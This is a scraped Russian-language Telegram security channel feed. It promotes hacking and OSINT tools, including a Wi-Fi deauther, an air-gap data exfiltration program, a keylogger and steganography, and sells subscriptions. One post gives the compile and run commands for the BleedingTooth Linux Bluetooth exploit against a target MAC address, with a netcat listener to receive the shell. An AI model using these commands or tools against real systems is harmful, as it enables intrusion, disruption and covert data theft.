Channel: Security
Авиаспоттинг по-хакерски
🎃 Вступить в закрытый канал / скрипто 🎃
👉 Подписаться 👈
#SDR #HackRF #ADS-B
Взгляни на небо! Возможно, над твоей головой каждые несколько минут будет пролетать самолет, а то и не один. Я живу не далеко от аэропорта, и воздушный трафик в моем районе особенно сильный. Сервисы вроде Flightradar24 удивительно точно показывают информацию о самолетах в воздухе, потому что получают данные по протоколу ADS-B. Это можно делать самостоятельно, и сегодня покажу как.
👉 Подписаться 👈
#SDR #HackRF #ADS-B
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10❤1
Wi-Fi-Flash-Drive - псевдо-USB-накопитель, который получает данные с ПК по Wi-Fi (на базе ESP32-S2)
Это USB-устройство на базе ESP32-S2, которое будет распознаваться как USB-накопитель, но все содержимое накопителя будет передаваться с сервера по Wi-Fi. Вы можете поделиться папкой на сервере, и она создаст псевдообраз FAT32 (это не настоящий образ, он не будет записываться на диск или в память, он может быть огромного размера, 500 ГБ и т. д., и он будет создаваться очень быстро). На данный момент серверная часть предназначена только для Windows (из-за сокетов в C++, но я не думаю, что это большая проблема — исправить это для работы с другими ОС).
🎃 Вступить в закрытый канал / скрипто 🎃
👉 Подписаться 👈
#wifi #fakewifi #ESP
Это USB-устройство на базе ESP32-S2, которое будет распознаваться как USB-накопитель, но все содержимое накопителя будет передаваться с сервера по Wi-Fi. Вы можете поделиться папкой на сервере, и она создаст псевдообраз FAT32 (это не настоящий образ, он не будет записываться на диск или в память, он может быть огромного размера, 500 ГБ и т. д., и он будет создаваться очень быстро). На данный момент серверная часть предназначена только для Windows (из-за сокетов в C++, но я не думаю, что это большая проблема — исправить это для работы с другими ОС).
👉 Подписаться 👈
#wifi #fakewifi #ESP
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11❤2
Tdesktop - это полный исходный код с инструкцией по сборке официального настольного клиента мессенджера Telegram, основанного на Telegram API и безопасном протоколе MTProto.
🎃 Вступить в закрытый канал / скрипто 🎃
👉 Подписаться 👈
#telegram #opensource
👉 Подписаться 👈
#telegram #opensource
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11❤1
This media is not supported in your browser
VIEW IN TELEGRAM
Некоторые компьютеры намеренно отключены от остального мира. Это включает в себя удаление их доступа к Интернету, беспроводной связи, Bluetooth, USB, внешнему хранилищу файлов и аудио. Это называется «воздушный зазор».❗️Но даже в такой ситуации ваши данные могут утечь ❗️
Эта программа запускает на компьютере процессы, вызывающие электромагнитное излучение. Излучения имеют широкий частотный диапазон. Притом мощности сигнала уже сейчас хватает, чтобы «перебороть» экранирование и вещать вовне, пусть пока на весьма незначительное расстояние (порядка двух метров).
Таким образом эта программа может передавать секретные данные с компьютера через АМ-радиоволны и кто-то может удаленно принимать сигнал с помощью SDR-приемника.
👉 Подписаться 👈
#SDR #AM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥15❤2
🎙 Skewy - маскирует разговор при помощи технологии ультразвукового глушителя, благодаря которому на записи речь будет хорошего качества.
🎃 Вступить в закрытый канал / скрипто 🎃
👉 Подписаться 👈
#voice
👉 Подписаться 👈
#voice
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11⚡1❤1
Dnstwist — это движок пермутации доменных имён для выявления сквоттинга аналогичных доменов, фишинговых атак, мошенничества и корпоративного шпионажа.
➖ Программа найдёт выглядящие схожим образом домены, которые противники могут использовать для атаки на вас.
🎃 Вступить в закрытый канал / скрипто 🎃
👉 Подписаться 👈
#Scanning
Полезна как дополнительный источник анализа целевых угроз.
👉 Подписаться 👈
#Scanning
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11
This media is not supported in your browser
VIEW IN TELEGRAM
img-stego - эта программа является простым примером слепой стеганографии изображений с использованием подстановки младших разрядов (LSB). Она позволяет пользователю скрывать любые данные в 24-битных растровых изображениях в графическом интерфейсе.
🎃 Вступить в закрытый канал / скрипто 🎃
👉 Подписаться 👈
#стеганография #img
👉 Подписаться 👈
#стеганография #img
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10
ImgOps -сервис для проверки метаданных и различных инструментов реверсного поиска изображений.
🎃 Вступить в закрытый канал / скрипто 🎃
👉 Подписаться 👈
#osint #metadata
👉 Подписаться 👈
#osint #metadata
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11❤1
Octosuite — это мощный и гибкий инструмент для сбора и анализа информации (OSINT) на платформе GitHub.
➖ Он позволяет автоматизировать поиск данных, выявлять уязвимости, отслеживать активность пользователей и репозиториев, а также собирать полезную информацию для анализа безопасности и разведки.
Основные возможности:
🎃 Вступить в закрытый канал / скрипто 🎃
👉 Подписаться 👈
#OSINT #Framework
Основные возможности:
Поиск пользователей, организаций и репозиториев по различным критериям.
👉 Подписаться 👈
#OSINT #Framework
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8❤1
Esp8266_deauther — это популярный и широко известный проект с открытым исходным кодом, использующий модуль ESP8266 Wi-Fi для выполнения атак деаутентификации (deauthentication attacks) на Wi-Fi сетях.
➖ С её помощью устройство может сканировать сети и точки доступа, производить атаки на сети и отключать от них клиентов.
🎃 Вступить в закрытый канал 🎃
👉 Подписаться 👈
#WiFi #Attack #Deauth #Scanning
👉 Подписаться 👈
#WiFi #Attack #Deauth #Scanning
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11❤1
Что вы получаете приобретая подписку ?
Весь контент — для образовательных целей. Автор не несет ответственности за незаконное использование.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8💔4
Бесплатная обучающая игра по SQL вдохновленная сериалом «Игра в кальмара». Всего 9 тематических уровней, в каждом из которых спрятана задача. Ошиблись — придется начинать заново. С каждым уровнем задания становятся всё сложнее, но везде даётся по 2 подсказки.
Если навыков не хватает или хотите выучить SQL с нуля, то есть 33 бесплатных урока, чтобы подтянуть знания.
👉 Подписаться 👈
#sql #game
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12💔3
Wave - терминал с открытым исходным кодом, который сочетает в себе традиционные возможности терминала с графическими возможностями, такими как предварительный просмотр файлов, веб-браузинг и помощь ИИ. Он работает на MacOS, Linux и Windows.
🎃 Вступить в закрытый канал 🎃
👉 Подписаться 👈
#terminal
👉 Подписаться 👈
#terminal
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8❤1
👉 Подписаться 👈
#Keylogger #Python #OpenSource
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11❤1
Forwarded from Security [private]
Это эксплойт для уязвимости нулевого дня в ядре Linux, позволяющий выполнить произвольный код в пространстве ядра с правами root. Эксплойт использует уязвимость в протоколе Bluetooth A2MP для перехвата управления системой.
BleedingTooth: Удалённое выполнение кода в Bluetooth-стеке Linux без взаимодействия пользователя (Zero-Click)
Компиляция:
Запуск:
В другом терминале выполнить:
При успешной эксплуатации для запуска калькулятора выполнится:
Успешность: ~80% для целевой версии ядра.
Ограничения:
⏺ Bluetooth должен быть активен и доступен для подключения.
⏺ SELinux/AppArmor могут блокировать выполнение кода.
⏺ Современные ядра (после 5.15) не уязвимы.
Статья на хакере - Эксперты Google и Intel предупредили об опасных Bluetooth-багах в Linux
BleedingTooth: Удалённое выполнение кода в Bluetooth-стеке Linux без взаимодействия пользователя (Zero-Click)
Компиляция:
$ gcc -o exploit BleedingTooth.c -lbluetooth
Запуск:
$ sudo ./exploit MAC-адрес атакуемого устройства
В другом терминале выполнить:
$ nc -lvp 1337
При успешной эксплуатации для запуска калькулятора выполнится:
$ export XAUTHORITY=/run/user/1000/gdm/Xauthority
$ export DISPLAY=:0
$ gnome-calculator
Успешность: ~80% для целевой версии ядра.
Ограничения:
Статья на хакере - Эксперты Google и Intel предупредили об опасных Bluetooth-багах в Linux
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5
Security [private]
Это эксплойт для уязвимости нулевого дня в ядре Linux, позволяющий выполнить произвольный код в пространстве ядра с правами root. Эксплойт использует уязвимость в протоколе Bluetooth A2MP для перехвата управления системой. BleedingTooth: Удалённое выполнение…
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5
CVE-2025-49144 — это уязвимость с высоким уровнем риска, связанная с повышением локальных привилегий, обнаруженная в установщиках Notepad++ версии 8.8.1 и более ранних версий. Эта уязвимость возникает из-за неконтролируемого поведения пути поиска исполняемых файлов во время установки, что позволяет локальному злоумышленнику получить привилегии системного уровня, поместив вредоносные исполняемые файлы в тот же каталог, что и установщик.
Купить книгу по пентесту для начинающих можно тут📔
🎃 Вступить в закрытый канал 🎃
👉 Подписаться 👈
#CVE #Windows #Linux
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#CVE #Windows #Linux
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4
HTML Embed Code: